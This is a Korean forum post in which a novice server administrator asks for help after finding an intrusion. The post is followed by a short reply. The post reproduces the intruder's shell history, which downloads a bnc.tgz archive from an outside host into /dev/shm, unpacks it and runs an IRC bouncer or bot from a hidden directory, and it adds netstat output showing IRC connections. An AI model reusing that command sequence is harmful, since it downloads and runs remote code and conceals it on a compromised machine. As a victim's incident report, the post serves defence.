서버에 누군가 들어왔던 흔적이

계속 남아 있습니다.

아직 초보자인지라 무슨 짓을 하고 나간 것인지 모르겠습니다만…

터미널을 띄워보면 제가 수행하지 않은 명령어들이 몇개씩 나오곤 합니다.

며칠전에도 한번 그랬었는데

오늘 터미널에서 지나간 명령어 몇개 띄워보니

/sbin/ifconfig |grep inet
cd /dev/shm
wget http://www.bye.ro/bnc.tgz
tar zxvf bnc.tgz
rm -rf bnc.tgz
cd .access.log
./config crush 6667 ; ./fuck ; ./run
exit

이런 명령어들이 남아 있네요.
/dev/shm에 1월 15일에 생성된 67메가바이트 파일이 4개, 7일에 3개
17일에 생성된 디렉토리 .access.log가 있습니다.
shm 디렉토리를 통째로 날려버리니
안에 있는 파일들은 지워졌는데
디렉토리는 제거가 안 되네요…

어떻게 대처해야 할까요…
조언을 부탁드립니다.

nestat |grep ESTABLISHED 해보니
전에 보지 못했던 연결들이 많이 보이는데요.
아래와 같습니다.
확실히 알고 있는 연결들은 제외하였습니다.

[code:36e69yal]
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
lazenca@jupiter:~$ netstat |grep ESTABLISHED
tcp 0 0 localhost:54211 localhost:6010 ESTABLISHED
tcp 0 0 localhost:47866 localhost:6010 ESTABLISHED
tcp 0 0 ...:51098 irc2.saunalahti.fi:ircd ESTABLISHED

tcp 0 0 localhost:54210 localhost:6010 ESTABLISHED

tcp 0 0 localhost:6010 localhost:54210 ESTABLISHED
tcp 0 0 ...:54648 irc.rcn.com:ircd ESTABLISHED
tcp 0 0 ...:57491 ec2-174-129-193-1:https ESTABLISHED
tcp 0 0 ...:50073 irc2.saunalahti.fi:ircd ESTABLISHED

tcp 0 244 ...:22002 ...:1309 ESTABLISHED

tcp 0 0 ...:ftp 115.89.235.251:64894 ESTABLISHED

tcp 0 0 ...:37517 irc.rcn.com:ircd ESTABLISHED
tcp 0 0 ...:35824 efnet.as6453.net:8888 ESTABLISHED
tcp 0 0 ...:38038 ec2-174-129-193-1:https ESTABLISHED
tcp 0 0 ...:40248 irc.rcn.com:ircd ESTABLISHED
tcp 0 0 localhost:6010 localhost:47866 ESTABLISHED
udp 448 0 localhost:36739 localhost:domain ESTABLISHED
[/code:36e69yal]

능력이 되신다면 로그분석을 해보시고…
아니면 재설치… =.=